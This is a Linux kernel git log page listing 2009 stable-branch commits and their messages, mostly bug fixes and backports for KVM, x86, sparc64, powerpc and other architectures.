linux - Linux kernel source tree

Age	Commit message (Collapse)	Author
2009-09-08	KVM: Reduce stack usage in kvm_pv_mmu_op()	Dave Hansen
	(cherry picked from commit 6ad18fba05228fb1d47cdbc0339fe8b3fca1ca26) We're in a hot path. We can't use kmalloc() because it might impact performance. So, we just stick the buffer that we need into the kvm_vcpu_arch structure. This is used very often, so it is not really a waste. We also have to move the buffer structure's definition to the arch-specific x86 kvm header. Signed-off-by: Dave Hansen <dave@linux.vnet.ibm.com> Signed-off-by: Avi Kivity <avi@qumranet.com> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-09-08	KVM: Reduce stack usage in kvm_arch_vcpu_ioctl()	Dave Hansen
	(cherry picked from commit b772ff362ec6b821c8a5227a3355e263f917bfad) [sheng: fix KVM_GET_LAPIC using wrong size] Signed-off-by: Dave Hansen <dave@linux.vnet.ibm.com> Signed-off-by: Sheng Yang <sheng.yang@intel.com> Signed-off-by: Avi Kivity <avi@qumranet.com> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-09-08	KVM: Reduce kvm stack usage in kvm_arch_vm_ioctl()	Dave Hansen
	(cherry picked from commit f0d662759a2465babdba1160749c446648c9d159) On my machine with gcc 3.4, kvm uses ~2k of stack in a few select functions. This is mostly because gcc fails to notice that the different case: statements could have their stack usage combined. It overflows very nicely if interrupts happen during one of these large uses. This patch uses two methods for reducing stack usage. 1. dynamically allocate large objects instead of putting on the stack. 2. Use a union{} member for all of the case variables. This tricks gcc into combining them all into a single stack allocation. (There's also a comment on this) Signed-off-by: Dave Hansen <dave@linux.vnet.ibm.com> Signed-off-by: Avi Kivity <avi@qumranet.com> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-09-08	KVM: MMU: Fix setting the accessed bit on non-speculative sptes	Avi Kivity
	(cherry picked from commit 3201b5d9f0f7ef392886cd76dcd2c69186d9d5cd) The accessed bit was accidentally turned on in a random flag word, rather than, the spte itself, which was lucky, since it used the non-EPT compatible PT_ACCESSED_MASK. Fix by turning the bit on in the spte and changing it to use the portable accessed mask. Signed-off-by: Avi Kivity <avi@qumranet.com> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-09-08	KVM: MMU: Flush tlbs after clearing write permission when accessing dirty log	Avi Kivity
	(cherry picked from commit 171d595d3b3254b9a952af8d1f6965d2e85dcbaa) Otherwise, the cpu may allow writes to the tracked pages, and we lose some display bits or fail to migrate correctly. Signed-off-by: Avi Kivity <avi@qumranet.com> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-09-08	KVM: MMU: Add locking around kvm_mmu_slot_remove_write_access()	Avi Kivity
	(cherry picked from commit 2245a28fe2e6fdb1bdabc4dcde1ea3a5c37e2a9e) It was generally safe due to slots_lock being held for write, but it wasn't very nice. Signed-off-by: Avi Kivity <avi@qumranet.com> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-09-08	KVM: Allocate guest memory as MAP_PRIVATE, not MAP_SHARED	Avi Kivity
	(cherry picked from commit acee3c04e8208c17aad1baff99baa68d71640a19) There is no reason to share internal memory slots with fork()ed instances. Signed-off-by: Avi Kivity <avi@qumranet.com> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-09-08	KVM: Load real mode segments correctly	Avi Kivity
	(cherry picked from commit f4bbd9aaaae23007e4d79536d35a30cbbb11d407) Real mode segments to not reference the GDT or LDT; they simply compute base = selector * 16. Signed-off-by: Avi Kivity <avi@qumranet.com> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-09-08	KVM: VMX: Change segment dpl at reset to 3	Avi Kivity
	(cherry picked from commit a16b20da879430fdf245ed45461ed40ffef8db3c) This is more emulation friendly, if not 100% correct. Signed-off-by: Avi Kivity <avi@qumranet.com> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-09-08	KVM: VMX: Change cs reset state to be a data segment	Avi Kivity
	(cherry picked from commit 5706be0dafd6f42852f85fbae292301dcad4ccec) Real mode cs is a data segment, not a code segment. Signed-off-by: Avi Kivity <avi@qumranet.com> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-08-16	x86: enable GART-IOMMU only after setting up protection methods	Mark Langsdorf
	commit fe2245c905631a3a353504fc04388ce3dfaf9d9e upstream. The current code to set up the GART as an IOMMU enables GART translations before it removes the aperture from the kernel memory map, sets the GART PTEs to UC, sets up the guard and scratch pages, or does a wbinvd(). This leaves the possibility of cache aliasing open and can cause system crashes. Re-order the code so as to enable the GART translations only after all safeguards are in place and the tlb has been flushed. AMD has tested this patch on both Istanbul systems and 1st generation Opteron systems with APG enabled and seen no adverse effects. Istanbul systems with HT Assist enabled sometimes see MCE errors due to cache artifacts with the unmodified code. Signed-off-by: Mark Langsdorf <mark.langsdorf@amd.com> Cc: Joerg Roedel <joerg.roedel@amd.com> Cc: akpm@linux-foundation.org Cc: jbarnes@virtuousgeek.org Signed-off-by: Ingo Molnar <mingo@elte.hu>
2009-08-16	parisc: ensure broadcast tlb purge runs single threaded	Helge Deller
	commit e82a3b75127188f20c7780bec580e148beb29da7 upstream parisc: ensure broadcast tlb purge runs single threaded The TLB flushing functions on hppa, which causes PxTLB broadcasts on the system bus, needs to be protected by irq-safe spinlocks to avoid irq handlers to deadlock the kernel. The deadlocks only happened during I/O intensive loads and triggered pretty seldom, which is why this bug went so long unnoticed. Signed-off-by: Helge Deller <deller@gmx.de> [edited to use spin_lock_irqsave on UP as well since we'd been locking there all this time anyway, --kyle] Signed-off-by: Kyle McMartin <kyle@mcmartin.ca> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-07-30	x86: don't use 'access_ok()' as a range check in get_user_pages_fast()	Linus Torvalds
	[ Upstream commit 7f8189068726492950bf1a2dcfd9b51314560abf - modified for stable to not use the sloppy __VIRTUAL_MASK_SHIFT ] It's really not right to use 'access_ok()', since that is meant for the normal "get_user()" and "copy_from/to_user()" accesses, which are done through the TLB, rather than through the page tables. Why? access_ok() does both too few, and too many checks. Too many, because it is meant for regular kernel accesses that will not honor the 'user' bit in the page tables, and because it honors the USER_DS vs KERNEL_DS distinction that we shouldn't care about in GUP. And too few, because it doesn't do the 'canonical' check on the address on x86-64, since the TLB will do that for us. So instead of using a function that isn't meant for this, and does something else and much more complicated, just do the real rules: we don't want the range to overflow, and on x86-64, we want it to be a canonical low address (on 32-bit, all addresses are canonical). Acked-by: Ingo Molnar <mingo@elte.hu> Cc: H. Peter Anvin <hpa@zytor.com> Cc: Thomas Gleixner <tglx@linutronix.de> Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-07-30	x86-64: Fix bad_srat() to clear all state	Andi Kleen
	commit 429b2b319af3987e808c18f6b81313104caf782c upstream. Need to clear both nodes and nodes_add state for start/end. Signed-off-by: Andi Kleen <ak@linux.intel.com> LKML-Reference: <20090718065657.GA2898@basil.fritz.box> Signed-off-by: H. Peter Anvin <hpa@zytor.com> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-07-02	x86: handle initrd that extends into unusable memory	Yinghai Lu
	commit 8c5dd8f43367f4f266dd616f11658005bc2d20ef upstream. On a system where system memory (according e820) is not covered by mtrr, mtrr_trim_memory converts a portion of memory to reserved, but bootloader has already put the initrd in that range. Thus, we need to have 64bit to use relocate_initrd too. [ Impact: fix using initrd when mtrr_trim_memory happen ] Signed-off-by: Yinghai Lu <yinghai@kernel.org> Signed-off-by: H. Peter Anvin <hpa@zytor.com> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-07-02	x86: quirk for reboot stalls on a Dell Optiplex 330	Steve Conklin
	commit 093bac154c142fa1fb31a3ac69ae1bc08930231b upstream. Dell Optiplex 330 appears to hang on reboot. This is resolved by adding a quirk to set bios reboot. Signed-off-by: Leann Ogasawara <leann.ogasawara@canonical.com> Signed-off-by: Steve Conklin <steve.conklin@canonical.com> Signed-off-by: Ingo Molnar <mingo@elte.hu> Cc: Jean Delvare <khali@linux-fr.org> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-07-02	x86: Add quirk for reboot stalls on a Dell Optiplex 360	Jean Delvare
	commit 4a4aca641bc4598e77b866804f47c651ec4a764d upstream. The Dell Optiplex 360 hangs on reboot, just like the Optiplex 330, so the same quirk is needed. Signed-off-by: Jean Delvare <jdelvare@suse.de> Cc: Steve Conklin <steve.conklin@canonical.com> Cc: Leann Ogasawara <leann.ogasawara@canonical.com> LKML-Reference: <200906051202.38311.jdelvare@suse.de> Signed-off-by: Ingo Molnar <mingo@elte.hu> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-06-11	x86: fix DMI on EFI	Brian Maly
	commit ff0c0874905fb312ca1491bbdac2653b0b48c20b upstream. Impact: reactivate DMI quirks on EFI hardware DMI tables are loaded by EFI, so the dmi calls must happen after efi_init() and not before. Currently Apple hardware uses DMI to determine the framebuffer mappings for efifb. Without DMI working you also have no video on MacBook Pro. This patch resolves the DMI issue for EFI hardware (DMI is now properly detected at boot), and additionally efifb now loads on Apple hardware (i.e. video works). Signed-off-by: Brian Maly <bmaly@redhat> Acked-by: Yinghai Lu <yinghai@kernel.org> Cc: ying.huang@intel.com LKML-Reference: <49ADEDA3.1030406@redhat.com> Signed-off-by: Ingo Molnar <mingo@elte.hu> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-06-11	x86/pci: fix mmconfig detection with 32bit near 4g	Yinghai Lu
	commit 75e613cdc7bb2ba3795b1bc3ddf19476c767ba68 upstream. Pascal reported and bisected a commit: \| x86/PCI: don't call e820_all_mapped with -1 in the mmconfig case which broke one system system. ACPI: Using IOAPIC for interrupt routing PCI: MCFG configuration 0: base f0000000 segment 0 buses 0 - 255 PCI: MCFG area at f0000000 reserved in ACPI motherboard resources PCI: Using MMCONFIG for extended config space it didn't have PCI: updated MCFG configuration 0: base f0000000 segment 0 buses 0 - 63 anymore, and try to use 0xf000000 - 0xffffffff for mmconfig For 32bit, mcfg_res->end could be 32bit only (if 64 resources aren't used) So use end - 1 to pass the value in mcfg->end to avoid overflow. We don't need to worry about the e820 path, they are always 64 bit. Reported-by: Pascal Terjan <pterjan@mandriva.com> Bisected-by: Pascal Terjan <pterjan@mandriva.com> Tested-by: Pascal Terjan <pterjan@mandriva.com> Signed-off-by: Yinghai Lu <yinghai@kernel.org> Signed-off-by: Jesse Barnes <jbarnes@virtuousgeek.org> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-06-11	x86: ignore VM_LOCKED when determining if hugetlb-backed page tables can be ↵	Mel Gorman
	shared or not commit 32b154c0b0bae2879bf4e549d861caf1759a3546 upstream. Addresses http://bugzilla.kernel.org/show_bug.cgi?id=13302 On x86 and x86-64, it is possible that page tables are shared beween shared mappings backed by hugetlbfs. As part of this, page_table_shareable() checks a pair of vma->vm_flags and they must match if they are to be shared. All VMA flags are taken into account, including VM_LOCKED. The problem is that VM_LOCKED is cleared on fork(). When a process with a shared memory segment forks() to exec() a helper, there will be shared VMAs with different flags. The impact is that the shared segment is sometimes considered shareable and other times not, depending on what process is checking. What happens is that the segment page tables are being shared but the count is inaccurate depending on the ordering of events. As the page tables are freed with put_page(), bad pmd's are found when some of the children exit. The hugepage counters also get corrupted and the Total and Free count will no longer match even when all the hugepage-backed regions are freed. This requires a reboot of the machine to "fix". This patch addresses the problem by comparing all flags except VM_LOCKED when deciding if pagetables should be shared or not for hugetlbfs-backed mapping. Signed-off-by: Mel Gorman <mel@csn.ul.ie> Acked-by: Hugh Dickins <hugh.dickins@tiscali.co.uk> Cc: Ingo Molnar <mingo@elte.hu> Cc: Lee Schermerhorn <Lee.Schermerhorn@hp.com> Cc: KOSAKI Motohiro <kosaki.motohiro@jp.fujitsu.com> Cc: <starlight@binnacle.cx> Cc: Eric B Munson <ebmunson@us.ibm.com> Cc: Adam Litke <agl@us.ibm.com> Cc: Andy Whitcroft <apw@canonical.com> Signed-off-by: Andrew Morton <akpm@linux-foundation.org> Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-06-11	x86: work around Fedora-11 x86-32 kernel failures on Intel Atom CPUs	Ingo Molnar
	commit 211b3d03c7400f48a781977a50104c9d12f4e229 upstream [Trivial backport to 2.6.27 by cebbert@redhat.com] x86: work around Fedora-11 x86-32 kernel failures on Intel Atom CPUs Impact: work around boot crash Work around Intel Atom erratum AAH41 (probabilistically) - it's triggering in the field. Reported-by: Linus Torvalds <torvalds@linux-foundation.org> Tested-by: Kyle McMartin <kyle@redhat.com> Signed-off-by: Ingo Molnar <mingo@elte.hu> Cc: <cebbert@redhat.com> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-06-11	sparc64: Reschedule KGDB capture to a software interrupt.	David S. Miller
	[ Upstream commit 42cc77c861e8e850e86252bb5b1e12e006261973 ] Otherwise it might interrupt switch_to() midstream and use half-cooked register window state. Reported-by: Chris Torek <chris.torek@windriver.com> Signed-off-by: David S. Miller <davem@davemloft.net> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-06-11	sparc64: Fix lost interrupts on sun4u.	David S. Miller
	[ Upstream commit d0cac39e4ec8097e4c7099d291b1fdcc0fe56b58 ] Based upon a report by Meelis Roos. Sparc64 SBUS and PCI controllers use a combination of IMAP and ICLR registers to manage device interrupts. The IMAP register contains the "valid" enable bit as well as CPU targetting information. Whereas the ICLR register is written with zero at the end of handling an interrupt to reset the state machine for that interrupt to IDLE so it can be sent again. For PCI slot and SBUS slot devices we can have multiple interrupts sharing the same IMAP register. There are individual ICLR registers but only one IMAP register for managing those. We represent each shared case with individual virtual IRQs so the generic IRQ layer thinks there is only one user of the IRQ instance. In such shared IMAP cases this is wrong, so if there are multiple active users then a free_irq() call will prematurely turn off the interrupt by clearing the Valid bit in the IMAP register even though there are other active users. Fix this by simply doing nothing in sun4u_disable_irq() and checking IRQF_DISABLED during IRQ dispatch. This situation doesn't exist in the hypervisor sun4v cases, so I left those alone. Tested-by: Meelis Roos <mroos@linux.ee> Signed-off-by: David S. Miller <davem@davemloft.net> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-06-11	sparc64: Fix crash with /proc/iomem	Mikulas Patocka
	[ Upstream commit 192d7a4667c6d11d1a174ec4cad9a3c5d5f9043c ] When you compile kernel on Sparc64 with heap memory checking and type "cat /proc/iomem", you get a crash, because pointers in struct resource are uninitialized. Most code fills struct resource with zeros, so I assume that it is responsibility of the caller of request_resource to initialized it, not the responsibility of request_resource functuion. After 2.6.29 is out, there could be a check for uninitialized fields added to request_resource to avoid crashes like this. Signed-off-by: Mikulas Patocka <mpatocka@redhat.com> Signed-off-by: David S. Miller <davem@davemloft.net> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-06-11	sparc64: Flush TLB before releasing pages.	David S. Miller
	[ Upstream commit 86ee79c3dbd48d7430fd81edc1da3516c9f6dabc ] tlb_flush_mmu() needs to flush pending TLB entries before processing the mmu_gather ->pages list. Noticed by Benjamin Herrenschmidt. Signed-off-by: David S. Miller <davem@davemloft.net> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-06-11	sparc64: Fix MM refcount check in smp_flush_tlb_pending().	David S. Miller
	[ Upstream commit f9384d41c02408dd404aa64d66d0ef38adcf6479 ] As explained by Benjamin Herrenschmidt: > CPU 0 is running the context, task->mm == task->active_mm == your > context. The CPU is in userspace happily churning things. > > CPU 1 used to run it, not anymore, it's now running fancyfsd which > is a kernel thread, but current->active_mm still points to that > same context. > > Because there's only one "real" user, mm_users is 1 (but mm_count is > elevated, it's just that the presence on CPU 1 as active_mm has no > effect on mm_count(). > > At this point, fancyfsd decides to invalidate a mapping currently mapped > by that context, for example because a networked file has changed > remotely or something like that, using unmap_mapping_ranges(). > > So CPU 1 goes into the zapping code, which eventually ends up calling > flush_tlb_pending(). Your test will succeed, as current->active_mm is > indeed the target mm for the flush, and mm_users is indeed 1. So you > will -not- send an IPI to the other CPU, and CPU 0 will continue happily > accessing the pages that should have been unmapped. To fix this problem, check ->mm instead of ->active_mm, and this means: > So if you test current->mm, you effectively account for mm_users == 1, > so the only way the mm can be active on another processor is as a lazy > mm for a kernel thread. So your test should work properly as long > as you don't have a HW that will do speculative TLB reloads into the > TLB on that other CPU (and even if you do, you flush-on-switch-in should > get rid of any crap here). And therefore we should be OK. Signed-off-by: David S. Miller <davem@davemloft.net> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-06-11	sparc: Fix bus type probing for ESP and LE devices.	David S. Miller
	If there is a dummy "espdma" or "ledma" parent device above ESP scsi or LE ethernet device nodes, we have to match the bus as SBUS. Otherwise the address and size cell counts are wrong and we don't calculate the final physical device resource values correctly at all. Commit 5280267c1dddb8d413595b87dc406624bb497946 ("sparc: Fix handling of LANCE and ESP parent nodes in of_device.c") was meant to fix this problem, but that only influences the inner loop of build_device_resources(). We need this logic to also kick in at the beginning of build_device_resources() as well, when we make the first attempt to determine the device's immediate parent bus type for 'reg' property element extraction. Based almost entirely upon a patch by Friedrich Oslage. Tested-by: Meelis Roos <mroos@linux.ee> Signed-off-by: David S. Miller <davem@davemloft.net> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-06-11	sparc64: Fix smp_callin() locking.	David S. Miller
	[ Upstream commit 8e255baa449df3049a8827a7f1f4f12b6921d0d1 ] Interrupts must be disabled when taking the IPI lock. Caught by lockdep. Reported-by: Meelis Roos <mroos@linux.ee> Signed-off-by: David S. Miller <davem@davemloft.net> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-05-08	MIPS: CVE-2009-0029: Enable syscall wrappers	dann frazier
	Backport of upstream commits by: Ralf Baechle <ralf@linux-mips.org> Xiaotian Feng <Xiaotian.Feng@windriver.com> upstream commits: dbda6ac0897603f6c6dfadbbc37f9882177ec7ac d6c178e9694e7e0c7ffe0289cf4389a498cac735 c189846ecf900cd6b3ad7d3cef5b45a746ce646b Signed-off-by: dann frazier <dannf@debian.org> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-05-08	x86/PCI: don't call e820_all_mapped with -1 in the mmconfig case	Yinghai Lu
	commit 044cd80942e47b9de0915b627902adf05c52377f upstream. e820_all_mapped need end is (addr + size) instead of (addr + size - 1) Cc: stable@kernel.org Acked-by: Ingo Molnar <mingo@elte.hu> Signed-off-by: Yinghai Lu <yinghai@kernel.org> Signed-off-by: Jesse Barnes <jbarnes@virtuousgeek.org> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-05-02	powerpc: Sanitize stack pointer in signal handling code	Josh Boyer
	This has been backported to 2.6.27.x from commit efbda86098 in Linus' tree. On powerpc64 machines running 32-bit userspace, we can get garbage bits in the stack pointer passed into the kernel. Most places handle this correctly, but the signal handling code uses the passed value directly for allocating signal stack frames. This fixes the issue by introducing a get_clean_sp function that returns a sanitized stack pointer. For 32-bit tasks on a 64-bit kernel, the stack pointer is masked correctly. In all other cases, the stack pointer is simply returned. Additionally, we pass an 'is_32' parameter to get_sigframe now in order to get the properly sanitized stack. The callers are know to be 32 or 64-bit statically. Signed-off-by: Josh Boyer <jwboyer@linux.vnet.ibm.com> Signed-off-by: Benjamin Herrenschmidt <benh@kernel.crashing.org> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-05-02	powerpc: Fix data-corrupting bug in __futex_atomic_op	Paul Mackerras
	upstream commit: 306a82881b14d950d59e0b59a55093a07d82aa9a Richard Henderson pointed out that the powerpc __futex_atomic_op has a bug: it will write the wrong value if the stwcx. fails and it has to retry the lwarx/stwcx. loop, since 'oparg' will have been overwritten by the result from the first time around the loop. This happens because it uses the same register for 'oparg' (an input) as it uses for the result. This fixes it by using separate registers for 'oparg' and 'ret'. Cc: stable@kernel.org Signed-off-by: Paul Mackerras <paulus@samba.org> Signed-off-by: Chris Wright <chrisw@sous-sol.org> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-05-02	x86, setup: mark %esi as clobbered in E820 BIOS call	Michael K. Johnson
	upstream commit: 01522df346f846906eaf6ca57148641476209909 Jordan Hargrave diagnosed a BIOS clobbering %esi in the E820 call. That particular BIOS has been fixed, but there is a possibility that this is responsible for other occasional reports of early boot failure, and it does not hurt to add %esi to the clobbers. -stable candidate patch. Cc: Justin Forbes <jmforbes@linuxtx.org> Signed-off-by: Michael K Johnson <johnsonm@rpath.com> Signed-off-by: H. Peter Anvin <hpa@zytor.com> Cc: stable@kernel.org Signed-off-by: Chris Wright <chrisw@sous-sol.org> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-05-02	x86: mtrr: don't modify RdDram/WrDram bits of fixed MTRRs	Andreas Herrmann
	upstream commit: 3ff42da5048649503e343a32be37b14a6a4e8aaf Impact: bug fix + BIOS workaround BIOS is expected to clear the SYSCFG[MtrrFixDramModEn] on AMD CPUs after fixed MTRRs are configured. Some BIOSes do not clear SYSCFG[MtrrFixDramModEn] on BP (and on APs). This can lead to obfuscation in Linux when this bit is not cleared on BP but cleared on APs. A consequence of this is that the saved fixed-MTRR state (from BP) differs from the fixed-MTRRs of APs -- because RdDram/WrDram bits are read as zero when SYSCFG[MtrrFixDramModEn] is cleared -- and Linux tries to sync fixed-MTRR state from BP to AP. This implies that Linux sets SYSCFG[MtrrFixDramEn] and activates those bits. More important is that (some) systems change these bits in SMM when ACPI is enabled. Hence it is racy if Linux modifies RdMem/WrMem bits, too. (1) The patch modifies an old fix from Bernhard Kaindl to get suspend/resume working on some Acer Laptops. Bernhard's patch tried to sync RdMem/WrMem bits of fixed MTRR registers and that helped on those old Laptops. (Don't ask me why -- can't test it myself). But this old problem was not the motivation for the patch. (See http://lkml.org/lkml/2007/4/3/110) (2) The more important effect is to fix issues on some more current systems. On those systems Linux panics or just freezes, see http://bugzilla.kernel.org/show_bug.cgi?id=11541 (and also duplicates of this bug: http://bugzilla.kernel.org/show_bug.cgi?id=11737 http://bugzilla.kernel.org/show_bug.cgi?id=11714) The affected systems boot only using acpi=ht, acpi=off or when the kernel is built with CONFIG_MTRR=n. The acpi options prevent full enablement of ACPI. Obviously when ACPI is enabled the BIOS/SMM modfies RdMem/WrMem bits. When CONFIG_MTRR=y Linux also accesses and modifies those bits when it needs to sync fixed-MTRRs across cores (Bernhard's fix, see (1)). How do you synchronize that? You can't. As a consequence Linux shouldn't touch those bits at all (Rationale are AMD's BKDGs which recommend to clear the bit that makes RdMem/WrMem accessible). This is the purpose of this patch. And (so far) this suffices to fix (1) and (2). I suggest not to touch RdDram/WrDram bits of fixed-MTRRs and SYSCFG[MtrrFixDramEn] and to clear SYSCFG[MtrrFixDramModEn] as suggested by AMD K8, and AMD family 10h/11h BKDGs. BIOS is expected to do this anyway. This should avoid that Linux and SMM tread on each other's toes ... Signed-off-by: Andreas Herrmann <andreas.herrmann3@amd.com> Cc: trenn@suse.de Cc: Yinghai Lu <yinghai@kernel.org> LKML-Reference: <20090312163937.GH20716@alberich.amd.com> Cc: <stable@kernel.org> Signed-off-by: Ingo Molnar <mingo@elte.hu> Signed-off-by: Chris Wright <chrisw@sous-sol.org> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-05-02	x86, PAT, PCI: Change vma prot in pci_mmap to reflect inherited prot	Pallipadi, Venkatesh
	upstream commit: 9cdec049389ce2c324fd1ec508a71528a27d4a07 While looking at the issue in the thread: http://marc.info/?l=dri-devel&m=123606627824556&w=2 noticed a bug in pci PAT code and memory type setting. PCI mmap code did not set the proper protection in vma, when it inherited protection in reserve_memtype. This bug only affects the case where there exists a WC mapping before X does an mmap with /proc or /sys pci interface. This will cause X userlevel mmap from /proc or /sysfs to fail on fork. Reported-by: Kevin Winchester <kjwinchester@gmail.com> Signed-off-by: Venkatesh Pallipadi <venkatesh.pallipadi@intel.com> Signed-off-by: Suresh Siddha <suresh.b.siddha@intel.com> Cc: Jesse Barnes <jbarnes@virtuousgeek.org> Cc: Dave Airlie <airlied@redhat.com> Cc: <stable@kernel.org> LKML-Reference: <20090323190720.GA16831@linux-os.sc.intel.com> Signed-off-by: Ingo Molnar <mingo@elte.hu> Signed-off-by: Chris Wright <chrisw@sous-sol.org> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-03-23	powerpc: Remove extra semicolon in fsl_soc.c	Johns Daniel
	TSEC/MDIO will not work with older device trees because of a semicolon at the end of a macro resulting in an empty for loop body. This fix only applies to 2.6.28; this code is gone in 2.6.29, according to Grant Likely! Signed-off-by: Johns Daniel <johns.daniel@gmail.com> Acked-by: Grant Likely <grant.likely@secretlab.ca> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-03-23	Fix misreporting of #cores as #hyperthreads for Q9550	Joe Korty
	Fix misreporting of #cores for the Intel Quad Core Q9550. For the Q9550, in x86_64 mode, /proc/cpuinfo mistakenly reports the #cores present as the #hyperthreads present. i386 mode was not examined but is assumed to have the same problem. A backport of the following three 2.6.29-rc1 patches fixes the problem: 066941bd4eeb159307a5d7d795100d0887c00442: [PATCH] x86: unmask CPUID levels on Intel CPUs 99fb4d349db7e7dacb2099c5cc320a9e2d31c1ef: [PATCH] x86: unmask CPUID levels on Intel CPUs, fix bdf21a49bab28f0d9613e8d8724ef9c9168b61b9: [PATCH] x86: add MSR_IA32_MISC_ENABLE bits to <asm/msr-index.h> From the first patch: "If the CPUID limit bit in MSR_IA32_MISC_ENABLE is set, clear it to make all CPUID information available. This is required for some features to work, in particular XSAVE." Originally-Developed-by: H. Peter Anvin <hpa@linux.intel.com> Backported-by: Joe Korty <joe.korty@ccur.com> Cc: Ingo Molnar <mingo@elte.hu> Signed-off-by: Joe Korty <joe.korty@ccur.com> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-03-23	S390: __div64_31 broken for CONFIG_MARCH_G5	Martin Schwidefsky
	commit 4fa81ed27781a12f6303b9263056635ae74e3e21 upstream. The implementation of __div64_31 for G5 machines is broken. The comments in __div64_31 are correct, only the code does not do what the comments say. The part "If the remainder has overflown subtract base and increase the quotient" is only partially realized, the base is subtracted correctly but the quotient is only increased if the dividend had the last bit set. Using the correct instruction fixes the problem. Reported-by: Frans Pop <elendil@planet.nl> Tested-by: Frans Pop <elendil@planet.nl> Signed-off-by: Martin Schwidefsky <schwidefsky@de.ibm.com> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-03-23	Build fix for __early_pfn_to_nid() undefined link error	Tony Luck
	commit 334f85b647bc46ff4d27ace55aa65f44d6a2f4db upstream. ia64 only defines __early_pfn_to_nid() for SPARSEMEM && NUMA configurations, so the recent: commit: f2dbcfa738368c8a40d4a5f0b65dc9879577cb21 mm: clean up for early_pfn_to_nid() ends up with some link problems for certain configuration files. Fix arch/ia64/Kconfig to only define HAVE_ARCH_EARLY_PFN_TO_NID in the cases where we do provide this function. Signed-off-by: Tony Luck <tony.luck@intel.com> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-03-16	Fix no_timer_check on x86_64	Alexander Graf
	fixed upstream in 2.6.28 in merge of ioapic.c for x86 In io_apic_32.c the logic of no_timer_check is "always make timer_irq_works return 1". Io_apic_64.c on the other hand checks for if (!no_timer_check && timer_irq_works()) basically meaning "make timer_irq_works fail" in the crucial first check. Now, in order to not move too much code, we can just reverse the logic here and should be fine off, basically rendering no_timer_check useful again. This issue seems to be resolved as of 2.6.28 by the merge of io_apic.c, but still exists for at least 2.6.27. Signed-off-by: Alexander Graf <agraf@suse.de> Acked-by: Marcelo Tosatti <mtosatti@redhat.com> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-03-16	ARM: Add i2c_board_info for RiscPC PCF8583	Russell King
	commit 531660ef5604c75de6fdead9da1304051af17c09 upstream Add the necessary i2c_board_info structure to fix the lack of PCF8583 RTC on RiscPC. Signed-off-by: Russell King <rmk+kernel@arm.linux.org.uk> Signed-off-by: Jean Delvare <khali@linux-fr.org> Cc: Alessandro Zummo <a.zummo@towertech.it> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-03-16	xen: disable interrupts early, as start_kernel expects	Jeremy Fitzhardinge
	commit 55d8085671863fe4ee6a17b7814bd38180a44e1d upstream. This avoids a lockdep warning from: if (DEBUG_LOCKS_WARN_ON(unlikely(!early_boot_irqs_enabled))) return; in trace_hardirqs_on_caller(); Signed-off-by: Jeremy Fitzhardinge <jeremy.fitzhardinge@citrix.com> Cc: Mark McLoughlin <markmc@redhat.com> Cc: Xen-devel <xen-devel@lists.xensource.com> Signed-off-by: Ingo Molnar <mingo@elte.hu> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-03-16	x86, vmi: TSC going backwards check in vmi clocksource	Alok N Kataria
	commit 48ffc70b675aa7798a52a2e92e20f6cce9140b3d upstream. Impact: fix time warps under vmware Similar to the check for TSC going backwards in the TSC clocksource, we also need this check for VMI clocksource. Signed-off-by: Alok N Kataria <akataria@vmware.com> Cc: Zachary Amsden <zach@vmware.com> Signed-off-by: Ingo Molnar <mingo@elte.hu> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-03-16	x86: tone down mtrr_trim_uncached_memory() warning	Ingo Molnar
